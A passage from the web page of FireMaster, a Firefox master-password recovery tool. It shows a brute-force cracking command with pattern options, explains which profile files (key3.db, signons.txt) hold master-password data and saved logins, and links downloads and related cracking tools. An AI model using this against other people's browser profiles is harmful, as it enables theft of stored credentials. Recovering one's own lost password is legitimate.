FireMaster.exe -b -c "abyz" -l 12 -p "fire?????123" c:\testpath
This will reduce the time to seconds which otherwise would have taken days or hours to crack that password. You can even crack the impossible looking passwords using the right pattern.
FireMaster in Action
FireMaster and FireFox
FireMaster is tested with latest Firefox version 3.0 and should work with any Firefox having version 1.0 or more.

If the FireMaster failed to work with your Firefox then please send me the key3.db and cert8.db (required for older versions) files which are present in your Firefox profile directory. Note that sign-on credentials are stored in the signons.txt file and key3.db just contains the master password related information. So even if some one knows your master password it will be useless unless he/she has access to signons.txt file.
FireMaster is designed with good intention to recover the lost master password so that every one keep enjoying their experience with Firefox. Like any other tool its use either good or bad, depends upon the user who uses it. However author is not responsible for damages or impact caused due to misuse of FireMaster.
Thanks to the Mozilla-Firefox crew for making such an excellent, beautiful, free browser.

Thanks to everyone who shared their experience with FireMaster and sending the valuable feedbacks and suggestions.
Download FireMaster
If you want to build the FireMaster from the source then you need to download the Gecko SDK from Mozilla website. 

FireMaster 3.1 binary & source download
See Also
   Using FireMaster with pattern based recovery technique 
   FirePassword: The Firefox Username & Password List Decryptor
   NetShareMonitor: Monitor your shares from intruders.
   Recover Windows password in seconds using Rainbow crack.